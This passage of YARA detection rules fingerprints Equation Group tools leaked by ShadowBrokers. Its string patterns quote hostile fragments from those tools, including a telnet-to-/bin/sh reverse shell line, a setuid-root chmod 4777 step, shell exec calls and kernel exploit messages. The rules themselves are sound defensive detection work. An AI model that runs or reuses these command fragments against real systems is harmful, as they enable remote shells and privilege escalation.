$s2 = "Usage: $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_jscan {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file jscan"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe"
id = "c4cebc69-8ec8-5ad7-bd93-55565b3eb92b"
strings:
$s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii
$s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_promptkill {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d"
id = "e0749b10-fa5a-5d73-86e1-e2008e121674"
strings:
$x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii
$x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_epoxyresin_v1_0_0 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73"
id = "390a13b0-3246-5bf7-8841-775a43045172"
strings:
$x1 = "[-] kernel not vulnerable" fullword ascii
$s1 = ".tmp.%d.XXXXXX" fullword ascii
$s2 = "[-] couldn't create temp file" fullword ascii
$s3 = "/boot/System.map-%s" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and $x1 ) or ( all of them )
}
rule EquationGroup_estopmoonlit {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220"
id = "7ae7a8b7-5e27-5604-8c57-6d60ffa0fb72"
strings:
$x1 = "[+] shellcode prepared, re-executing" fullword ascii
$x2 = "[-] kernel not vulnerable: prctl" fullword ascii
$x3 = "[-] shell failed" fullword ascii
$x4 = "[!] selinux apparently enforcing. Continue [y|n]? " fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_envoytomato {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5"
id = "d1a43c98-9448-5a03-824d-5cd8e959fbf5"
strings:
$s1 = "[-] kernel not vulnerable" fullword ascii
$s2 = "[-] failed to spawn shell" fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_smash {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file smash"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6"
id = "9a8cb090-4f47-5674-accb-f233dbb19b71"
strings:
$x1 = "T=<target IP> [O=<port>] Y=<target type>" fullword ascii
$x2 = "no command given!! bailing..." fullword ascii
$x3 = "no port. assuming 22..." fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_ratload {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
id = "81590569-e81b-5d97-8295-cc6f018fab98"
strings:
$x1 = "/tmp/ratload.tmp.sh" fullword ascii
$x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
$s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_ys {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15"
id = "abd120e7-23f8-530e-b21e-c50a2b571332"
strings:
$x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii
$x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii
$x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_ewok {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ewok"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72"
id = "379c233f-86f8-5116-a15c-8a80b27daea6"
strings:
$x1 = "Example: ewok -t target public" fullword ascii
$x2 = "Usage: cleaner host community fake_prog" fullword ascii
$x3 = "-g - Subset of -m that Green Spirit hits " fullword ascii
$x4 = "--- ewok version" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 80KB and 1 of them )
}
rule EquationGroup_xspy {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file xspy"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf"
id = "fcb7246a-d613-51d7-a4f7-f767fa5f79e1"
strings:
$s1 = "USAGE: xspy -display <display> -delay <usecs> -up" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 60KB and all of them )
}
rule EquationGroup_estesfox {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a"
id = "f2e8b8ba-af09-5e7c-a99c-4f620a0917c9"
strings:
$x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii
condition:
all of them
}
rule EquationGroup_elatedmonkey_1_0_1_1 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
modified = "2022-08-18"
hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090"
id = "d8915305-2ed7-50b7-84d0-b139a6d3481a"
strings:
$s1 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii
$s2 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii
$s3 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii
$s4 = "cat > /dev/tcp/127.0.0.1/80 <<" ascii
condition:
filesize < 15KB and 2 of them
}
rule EquationGroup_scanner {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file scanner"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
id = "b2f9c534-0ca7-5223-b85e-8e74c3cfa6ff"
strings:
$x1 = "program version netid address service owner" fullword ascii
$x4 = "*** Sorry about the raw output, I'll leave it for now" fullword ascii
$x5 = "-scan winn %s one" fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup__ftshell_ftshell_v3_10_3_0 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
super_rule = 1
hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
strings:
$s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" fullword ascii
$s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii
$s3 = "system rm -f /current/tmp/ftshell.latest" fullword ascii
$s4 = "# ftshell -- File Transfer Shell" fullword ascii
condition:
( uint16(0) == 0x2123 and filesize < 100KB and 1 of them ) or ( 2 of them )
}